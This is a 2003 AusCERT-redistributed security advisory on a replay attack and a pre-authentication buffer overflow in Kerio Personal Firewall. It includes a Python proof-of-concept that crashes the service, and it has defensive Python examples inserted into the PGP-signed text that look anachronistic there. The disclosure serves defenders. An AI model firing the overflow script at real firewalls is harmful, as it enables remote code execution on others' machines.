ESB-2003.0321 -- Core Security Technologies Advisory CORE-2003-0305-02 -- Vulnerabilities in Kerio Personal Firewall

Date: 29 April 2003

-----BEGIN PGP SIGNED MESSAGE-----

===========================================================================
             AUSCERT External Security Bulletin Redistribution

  ESB-2003.0321 -- Core Security Technologies Advisory CORE-2003-0305-02
                Vulnerabilities in Kerio Personal Firewall
                               29 April 2003

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:                Kerio Personal Firewall
Vendor:                 Core Security Technologies
Operating System:       Windows
Impact:                 Reduced Security
Access Required:        Remote

- --------------------------BEGIN INCLUDED TEXT--------------------

                         Core Security Technologies Advisory
                             http://www.coresecurity.com

                      Vulnerabilities in Kerio Personal Firewall



Date Published: 2003-04-28

Last Update: 2003-04-28

Advisory ID: CORE-2003-0305-02

Bugtraq ID: 7179, 7180

CVE Name: None currently assigned

Title: Kerio Personal Firewall Replay Attack and Buffer Overflow

Class: Design Error; Boundary Error Condition (Buffer Overflow)

Remotely Exploitable: Yes

Locally Exploitable: Yes

Advisory URL:
  http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10

Vendors contacted:
  - Kerio
  We sent notification mails to the following addresses:
  security@kerio.com, support@kerio.com, webmaster@kerio.com,
  kpf_bugs@kerio.com several times during March and April
  (2003-03-11, 2003-03-24, 2003-04-10, 2003-04-24) and never
  received an answer from Kerio.

Release Mode: USER RELEASE


*Vulnerability Description:*

  Kerio Personal Firewall (KPF) is a firewall for workstations designed
  to protect them against attacks from the Internet and the local
  network. We found two security vulnerabilities in KPF's remote
  administration system:

  [BID 7179]
  A replay attack is possible against the authenticated/encrypted
  channel for remote administration. A design problem in the
  authentication mechanism for remote administration allows an attacker
  to replay captured packets from a valid remote administration session
  in order to reproduce the administrator's directives to the personal
  firewall.
  For example, if the attacker is able to sniff a valid session in which
  the administrator disabled the firewall capabilities, then the
  attacker will gain the ability to disable the personal firewall at
  will at any time in the future.

  [BID 7180]
  A remotely exploitable buffer overflow exists in the administrator
  authentication process.


*Vulnerable Packages:*

  Kerio Personal Firewall version 2.1.4 and previous versions.


*Solution/Vendor Information/Workaround:*

  Contact the vendor for a fix.
  Workaround: disable the remote administration feature.


*Credits:*

  These vulnerabilities were found by Emiliano Kargieman, Hernán Gips
  and Javier Burroni from Core Security Technologies during
  Bugweek 2003 (March 3-7, 2003).


*Technical Description - Exploit/Concept Code:*

  We found two security vulnerabilities in Kerio PF's remote
  administration system.

  [BID 7179]
  A replay attack is possible against the authenticated/encrypted
  remote administration channel. As a result of a design problem in the
  authentication mechanism for remote administration, it is possible
  to replay a previously captured administration session.

  If 'S' is the workstation running Kerio personal firewall and 'C' is
  the administrator workstation, the following scheme shows the initial
  key exchange and authentication packets for a remote administration
  session:

   S           C
         <--- connect
         ---> 10 bytes (0f 00 0a 00 01 00 00 00 02 00)
  [*]    ---> 128 bytes (the initial 64 bytes are 0 and the last
                         64 bytes are the 'public' key)
         ---> 128 bytes (Everything is 0ed except the last 4 bytes
                         [01 00 01 00])
  [0]    <--- 4 bytes (00 00 00 40)
  [1]    <--- 64 bytes (These 64 bytes change from session to session)
  [2]    <--- 32 bytes (From now on, everything is encrypted and differs
                        from session to session)
         ---> 4 bytes ()
  [3]    <--- 64 bytes (user authentication)
         ........
         ........  (The session continues with commands and responses)
         ........

  [*] The last 64 bytes of this packet are read from the file
  'persfw.key' on the Kerio installation directory.

  It was noted from analyzing these sessions that the first differences
  between different sessions come from the administrator's workstation
  'C'. This led us to try replaying an administration session as a
  whole, with the unexpected result that it was deemed valid by 'S'.
  This shows that in fact no randomization or serialization is used on
  the 'server' side 'S', and thus there is no way for Kerio to ensure
  that the session is new and not a replay of an old one.

  As a result, an attacker with access to an encrypted administration
  session can record the session and replay it to the server at a later
  time to reissue the administration commands to the personal firewall.
  The commands replayed can include enabling/disabling the firewall,
  adding firewall rules, etc.
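The design flaw above is that 'S' contributes no per-session value, so a recorded transcript verifies again later. The following added example (written for this bulletin, not Core's or Kerio's code) models that property in a simplified handshake: an HMAC over a client nonce and a command stands in for the encrypted session, the shared key is a constructed placeholder, and the command and nonce names are assumptions. The flawed server accepts a replayed "disable" transcript; the hardened variant issues a random, single-use server nonce that the client must bind into its authenticator, so the same recording is rejected.

```python
import hashlib
import hmac
import os

# Constructed stand-in for the per-installation key material; not Kerio's format.
SHARED_KEY = b"constructed-demo-key-not-real"


class NoFreshnessServer:
    """Models the flawed design: the protected host 'S' contributes nothing
    that changes between sessions, so a recorded transcript verifies again."""

    def __init__(self):
        self.firewall_enabled = True

    def challenge(self):
        # The flawed server issues no per-session value at all.
        return b""

    def _fresh(self, server_nonce):
        return True  # nothing to compare against

    def handle(self, transcript):
        client_nonce, server_nonce, cmd, tag = transcript
        if not self._fresh(server_nonce):
            return False
        expected = hmac.new(SHARED_KEY, client_nonce + server_nonce + cmd,
                            hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return False
        if cmd == b"DISABLE":
            self.firewall_enabled = False
        elif cmd == b"ENABLE":
            self.firewall_enabled = True
        return True


class FreshNonceServer(NoFreshnessServer):
    """Hardened variant: 'S' issues a random, single-use nonce that the client
    must bind into its authenticator, so an old transcript cannot verify."""

    def __init__(self):
        super().__init__()
        self._pending = None

    def challenge(self):
        self._pending = os.urandom(16)
        return self._pending

    def _fresh(self, server_nonce):
        pending, self._pending = self._pending, None   # single use
        return pending is not None and hmac.compare_digest(server_nonce, pending)


def admin_session(server, cmd):
    """Administrator workstation 'C': runs one session and returns the
    transcript exactly as an on-path observer would have recorded it."""
    client_nonce = os.urandom(16)
    server_nonce = server.challenge()
    tag = hmac.new(SHARED_KEY, client_nonce + server_nonce + cmd,
                   hashlib.sha256).digest()
    transcript = (client_nonce, server_nonce, cmd, tag)
    return transcript, server.handle(transcript)


def replay_demo(server_cls):
    """Returns (first_session_accepted, replay_accepted, firewall_enabled_after)."""
    server = server_cls()
    recorded, first_ok = admin_session(server, b"DISABLE")
    server.firewall_enabled = True      # the admin later re-enables the firewall
    server.challenge()                  # the replay arrives as a brand-new connection
    replay_ok = server.handle(recorded)
    return first_ok, replay_ok, server.firewall_enabled


if __name__ == "__main__":
    print("no freshness :", replay_demo(NoFreshnessServer))   # (True, True, False)
    print("server nonce :", replay_demo(FreshNonceServer))     # (True, False, True)
```

The point of the comparison is that the client's changing 64 bytes are not enough: freshness must come from the side that decides whether to act on the command, and the value it issues must be consumed after one use.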


  [BID 7180]
  A remotely exploitable buffer overflow exists in the administrator
  authentication process. When the administrator connects to the firewall,
  a handshake occurs in order to establish an encrypted session. The 4th
  packet of the handshake (the first packet sent by the administrator)
  is a 4-byte packet carrying the fixed value 0x40 (64), indicating
  the size of the following packet, which is expected to contain the
  administrator's key.
  No boundary checks exist on the firewall side when processing this
  data: recv() reads the 4 bytes and then attempts to read the
  amount of data indicated by those 4 bytes into a buffer on the stack.
  As a result, an attacker connecting to the administration port on the
  personal firewall can construct a packet sequence that will overflow
  the buffer on the stack, allowing her to execute arbitrary code on
  the machine running the personal firewall.

  It is important to note that these packets are accepted by the
  personal firewall before authentication of the administrator takes
  place.

  The following proof-of-concept Python script will make the program
  jump to address 0x41414141. Note that there is enough space in the
  buffer (approx. 1800 bytes) to insert shellcode.

- ---------------------
import os
import socket
import struct
import string

def g():
     fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     try:
         fd.connect(('192.168.66.160', 44334))
         fd.recv(10)
         fd.recv(256)
         fd.send(struct.pack('!L', 0x149c))
         astr = 'A'*0x149c
         fd.send(astr)

     except Exception, e:
         print e
         pass

     fd.close()

g()
- ---------------------
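The defect is a length field trusted before the read, so the fix is to validate the declared length against the receiving buffer before any payload is accepted. The added example below is not Core's PoC or Kerio's code: it reads the same 4-byte big-endian length (the PoC packs it with '!L') from a constructed in-memory recording, rejects anything other than the protocol's fixed 0x40, caps the read at the buffer size, and classifies recordings so the result can feed a log or an alert. The stream class, buffer size constant and message strings are assumptions made for the example.

```python
import io
import struct

KEY_PACKET_LEN = 0x40        # the only length the protocol ever sends here
STACK_BUFFER_LEN = 0x40      # size of the fixed buffer the key is read into (assumed)


class RecordedStream:
    """Constructed stand-in for a socket: serves bytes from a recording."""

    def __init__(self, data):
        self._buf = io.BytesIO(data)

    def recv(self, n):
        return self._buf.read(n)


def recv_exact(sock, n):
    """Read exactly n bytes; returns fewer only if the peer closes early."""
    chunks = []
    remaining = n
    while remaining:
        chunk = sock.recv(remaining)
        if not chunk:
            break
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


def read_admin_key(sock, buf=None):
    """Hardened read of the length-prefixed key packet: the declared length is
    checked against both the protocol constant and the buffer before a single
    byte of payload is received."""
    if buf is None:
        buf = bytearray(STACK_BUFFER_LEN)
    header = recv_exact(sock, 4)
    if len(header) != 4:
        raise ValueError("truncated length field")
    declared = struct.unpack("!I", header)[0]   # big-endian, as the PoC packs it
    if declared != KEY_PACKET_LEN or declared > len(buf):
        raise ValueError(
            f"rejected key length 0x{declared:x} (expected 0x{KEY_PACKET_LEN:x})")
    payload = recv_exact(sock, declared)
    if len(payload) != declared:
        raise ValueError("truncated key payload")
    buf[:declared] = payload
    return declared


def check_handshake(recording):
    """Classify a recorded client packet sequence for detection or logging."""
    try:
        n = read_admin_key(RecordedStream(recording))
        return f"ok: {n}-byte key"
    except ValueError as exc:
        return f"alert: {exc}"


# Constructed sample traffic: a well-formed key packet, an oversized length of
# the shape used by the PoC above, and a declared length the peer never fills.
BENIGN = struct.pack("!I", KEY_PACKET_LEN) + b"\x01" * KEY_PACKET_LEN
OVERSIZED = struct.pack("!I", 0x149c) + b"A" * 0x149c
TRUNCATED = struct.pack("!I", KEY_PACKET_LEN) + b"\x01" * 10

if __name__ == "__main__":
    for name, rec in (("benign", BENIGN), ("oversized", OVERSIZED),
                      ("truncated", TRUNCATED)):
        print(name, "->", check_handshake(rec))
```

Because the advisory notes that these packets are processed before authentication, a length field other than 0x40 on the administration port is a strong signal for a network sensor even where the host itself cannot be patched, which makes the same check useful as a detection rule as well as a code fix.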



*About Core Security Technologies*

  Core Security Technologies develops strategic security solutions for
  Fortune 1000 corporations, government agencies and military
  organizations. The company offers information security software and
  services designed to assess risk and protect and manage information
  assets.
  Headquartered in Boston, MA, Core Security Technologies can be
  reached at 617-399-6980 or on the Web at http://www.coresecurity.com.

  To learn more about CORE IMPACT, the first comprehensive penetration
  testing framework, visit:
  http://www.coresecurity.com/products/coreimpact


*DISCLAIMER:*

  The contents of this advisory are copyright (c) 2003 CORE Security
  Technologies and may be distributed freely provided that no fee is
  charged for this distribution and proper credit is given.

$Id: Kerio-advisory.txt,v 1.6 2003/04/28 14:52:05 carlos Exp $

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content.  The decision to use any or all of this information is
the responsibility of each user or organisation, and should be done so in
accordance with site policies and procedures.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

If you believe that your system has been compromised, contact AusCERT or
your representative in FIRST (Forum of Incident Response and Security
Teams).

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business 
                hours which are GMT+10:00 (AEST).  On call after hours 
                for member emergencies only.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: http://www.auscert.org.au/render.html?it=1967

iQCVAwUBPq6Uayh9+71yA2DNAQFGNwP/RRiQ5Zsl+St4o/+jSrgNEGkY5W0oqBjo
mB5vzfCdWgO8A03FiMTo5nkfteEE39WG167yBPyi0Wx3t4226KUsK0XKw98D+/pY
m+eEG4sZfbI47Tiv2G515ZNs3OTWl5Z+w+zoegwgv5OZpRijyBPJV43rp80WL0HX
T5Y1KfzKp10=
=z9lz
-----END PGP SIGNATURE-----